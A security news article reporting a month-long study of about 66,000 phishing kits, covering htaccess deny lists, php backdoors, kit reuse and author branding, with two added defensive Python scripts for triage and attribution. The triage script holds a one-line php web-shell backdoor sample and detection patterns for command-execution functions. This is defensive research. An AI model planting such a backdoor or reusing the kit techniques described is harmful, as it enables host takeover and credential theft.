Phishing kits are used extensively by cybercriminals to increase the efficiency of stealing user credentials. The basic kit comprises an accurate clone of the target service’s login page (Gmail, Facebook, Office 365, targeted banks, etc) and a pre-written php script to steal the credentials — both bundled and distributed as a zip file. Successfully phished credentials are mailed by the script to the phisher, or gathered in a text file for later collection. This is commodity phishing, not spear-phishing.
A legitimate website, often a WordPress site with old and vulnerable add-ons, is compromised. An orphaned page with no internal links is created, and the kit is uploaded and unzipped there. Largely unknown to the site’s administrator and invisible to external search engines, it is ready to use: the criminal merely has to send out his phishing emails pointing to the spoofed login on the compromised website.
Wright used two different community-driven phishing URL feeds to locate live kits: PhishTank, run by OpenDNS, and OpenPhish.
“We polled these feeds repeatedly over a month to get new suspect phishing URLs to analyze,” Wright told SecurityWeek. “We collected about 66,000.”
One of the first things discovered was widespread use of persistence techniques. A common method on compromised WordPress sites is the inclusion of an htaccess directory configuration file within the phishing kit, which blocks access to the phishing folder from threat intelligence services. One example blocks more than 220 specified domains (including major endpoint protection firms, law enforcement agencies, and individual IP addresses). “Comparison of the different htaccess files,” said Wright, “showed that there is definite information sharing between the kit developers.”
The same functionality was sometimes provided by php scripts included in the kit — but Duo detected more than 200 instances of the kit developers’ own backdoors buried within the code. It is a simple call to the system function. “It takes whatever you give it as a parameter and executes it as a system command,” explained Wright. “This lets anyone gain access to the host, leaving it wide open for future attack.” It gives the original kit developer future access to the host without having to go through the process of compromising it himself. In a similar vein, some of the scripts contained obfuscated code to quietly send the stolen credentials to the developer as well as the phisher.
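The two kit-level indicators just described (an htaccess deny list that walls off the phishing folder, and a php file that passes a request parameter straight to a command-execution function) are easy to triage mechanically once a kit has been unpacked. The script below is an added example written for this article, not code from Duo’s study; it runs over a constructed, in-memory stand-in for a kit’s files rather than a real archive, and the deny-list threshold, the documentation-range IP and the `.example` domains are assumptions chosen for illustration.

```python
import re

# Constructed sample of files from a phishing kit, as a path -> contents map.
# These are illustrative stand-ins, not kit contents from the Duo study.
SAMPLE_KIT = {
    "login/.htaccess": "\n".join([
        "Order Allow,Deny",
        "Allow from all",
        "Deny from 203.0.113.0/24",        # constructed (documentation range)
        "Deny from .example-scanner.net",   # constructed
        "Deny from .example-av.com",        # constructed
    ]) + "\n",
    "login/index.php": "<?php /* cloned login form */ ?>",
    "login/post.php": "<?php mail($to, 'Result', $body); ?>",
    "login/img/cfg.php": "<?php system($_GET['q']); ?>",   # the developer backdoor pattern the article describes
}

# Request superglobals that carry attacker-controlled input.
REQUEST_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# PHP functions that execute their argument as a system command.
EXEC_FUNCS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\("
# One PHP statement: an exec function whose argument list contains a request superglobal.
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"[^;]*" + REQUEST_INPUT)
# One "Deny from <target>" line of an Apache htaccess file.
DENY_RE = re.compile(r"^\s*deny\s+from\s+(\S+)", re.IGNORECASE | re.MULTILINE)


def find_deny_lists(kit, threshold=3):
    """Return {path: [denied targets]} for .htaccess files that deny at least
    `threshold` hosts or networks. A long deny list inside a login folder is the
    persistence technique the article describes; the threshold is an assumption."""
    hits = {}
    for path, body in kit.items():
        if path.rsplit("/", 1)[-1] != ".htaccess":
            continue
        denied = DENY_RE.findall(body)
        if len(denied) >= threshold:
            hits[path] = denied
    return hits


def find_backdoors(kit):
    """Return {path: matched snippet} for PHP files that hand request input
    directly to a command-execution function."""
    hits = {}
    for path, body in kit.items():
        if not path.endswith(".php"):
            continue
        match = BACKDOOR_RE.search(body)
        if match:
            hits[path] = match.group(0)
    return hits


def triage(kit):
    """Run both checks and return the findings grouped by kind."""
    return {"deny_lists": find_deny_lists(kit), "backdoors": find_backdoors(kit)}


if __name__ == "__main__":
    for kind, findings in triage(SAMPLE_KIT).items():
        for path, detail in findings.items():
            print(f"{kind}: {path}: {detail}")
```

The backdoor pattern deliberately matches only when request input reaches an execution function in the same statement; a kit’s legitimate `mail()` call or a plain `echo $_GET[...]` is not flagged, which keeps the check usable as a first-pass filter over thousands of kits before a human looks at the hits.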
By hashing the collected phishing kits, Duo was able to examine the extent of kit reuse. In the month-long investigation, it found that the majority of kits were only used once — but 27% (more than 900 kits) were seen on more than one host. Two were found on more than thirty hosts, indicating very active attackers. “We expect,” said Wright, “that as we continue this study, we shall see more instances of reuse.”
The email addresses of the individual kit users were extracted and correlated to show which phishers were connected with which campaigns and which phishing kits. Duo found that the kit developer would often use the ‘From’ header as a ‘brand’ signing card, tying multiple different kits to the same author. One in particular called himself ‘wirez[@]googledocs[.]org’. This branding was found in more than 115 unique phishing kits spoofing multiple service providers.
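The two analyses above, hashing kits to measure reuse across hosts and pulling the ‘From’ branding out of the mailer script to tie kits to an author, can be expressed in a few functions. The following is an added example for this article, not Duo’s tooling; it works on constructed observations (URLs and short byte strings standing in for the retrieved zip archives) and constructed php sources, and every host name and address in it is an `.example` placeholder.

```python
import hashlib
import re
from collections import defaultdict
from urllib.parse import urlparse

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# The From header a kit's mail() call sets; the article notes developers use it as a brand.
FROM_RE = re.compile(r"From:\s*([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})",
                     re.IGNORECASE)

# Constructed observations: (URL the kit was retrieved from, bytes of the kit archive).
# Real kits are zip files; short byte strings stand in for them here.
OBSERVATIONS = [
    ("http://site-a.example/wp-content/uploads/x/", b"KIT-ALPHA"),
    ("http://site-b.example/old/login/", b"KIT-ALPHA"),
    ("http://site-c.example/secure/", b"KIT-ALPHA"),
    ("http://site-d.example/verify/", b"KIT-BETA"),
]

# Constructed php sources for each stand-in archive (path -> contents).
KIT_SOURCES = {
    b"KIT-ALPHA": {
        "post.php": "<?php $h = \"From: author1@example.net\\r\\n\";"
                    " mail('operator1@example.org', 'Rez', $msg, $h); ?>",
    },
    b"KIT-BETA": {
        "send.php": "<?php $h = 'From: author1@example.net';"
                    " mail('operator2@example.org', 'x', $m, $h); ?>",
    },
}


def kit_hash(archive):
    """Identity of a kit: the SHA-256 of the archive bytes as retrieved."""
    return hashlib.sha256(archive).hexdigest()


def hosts_per_kit(observations):
    """Map kit hash -> set of host names the identical kit was found on."""
    seen = defaultdict(set)
    for url, archive in observations:
        seen[kit_hash(archive)].add(urlparse(url).hostname)
    return seen


def reused_kits(observations, min_hosts=2):
    """Kits seen on at least `min_hosts` distinct hosts, with those hosts sorted."""
    return {h: sorted(hosts) for h, hosts in hosts_per_kit(observations).items()
            if len(hosts) >= min_hosts}


def extract_addresses(files):
    """Return (From-header addresses, all addresses) found in a kit's sources.
    Addresses that are not the From brand are the recipients, i.e. the phisher
    running the kit and any hidden developer copy."""
    froms, all_addrs = set(), set()
    for body in files.values():
        froms.update(a.lower() for a in FROM_RE.findall(body))
        all_addrs.update(a.lower() for a in EMAIL_RE.findall(body))
    return froms, all_addrs


def kits_by_author(kit_sources):
    """Map From-header brand -> sorted kit hashes that carry it."""
    by_author = defaultdict(set)
    for archive, files in kit_sources.items():
        froms, _ = extract_addresses(files)
        for author in froms:
            by_author[author].add(kit_hash(archive))
    return {a: sorted(k) for a, k in by_author.items()}


if __name__ == "__main__":
    for h, hosts in reused_kits(OBSERVATIONS).items():
        print(f"kit {h[:12]} reused on {len(hosts)} hosts: {hosts}")
    for author, kits in kits_by_author(KIT_SOURCES).items():
        print(f"brand {author} appears in {len(kits)} distinct kits")
```

Hashing the archive as retrieved is what makes reuse measurable: two uploads of the same zip on different compromised sites collapse to one hash, while a developer’s edited re-release shows up as a separate kit that the From brand then links back to the same author.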
While information sharing in the cybercriminal world is well-known, this is the first evidence of the extent to which phishing kits and phishing information are also shared.
“A next step from this study, and something we are trying to establish,” Wright told SecurityWeek, “is a funnel to send the discovered email addresses of the phishers to the relevant authorities — both email providers and law enforcement. If we can get that email address shut down as soon as we find it, any credentials harvested by the phishing kit will not be sent to the phisher — and that’s a net gain for the defenders.” It neutralizes the phishing kit without having to go through the process of shutting down the compromised website — which may otherwise be perfectly legitimate.
“I’ll be able to say, I know this information was collected,” he continued, “and from there it was emailed to that attacker. I’ve already been in touch with Gmail or Yahoo to get that address taken down — well, that’s huge. If I have that kind of knowledge and I have that kind of insight into what happened, I can take effective action in my incident response cleanup activities.”
The reality, however, is that this level of information could also lead to some organizations taking matters into their own hands with ‘active defense’. If a particular phishing kit attacking a particular organization is discovered, and found to include the system call backdoor in the php script code, then that organization could enter the host and remove the danger. “A risk with any kind of hacking back is it’s so easy to cause collateral damage,” warned Wright; “and that’s what you have to be so careful about. This study is about how you can help protect your organization — it’s not about hacking back.” Which is, of course, illegal — for now at least.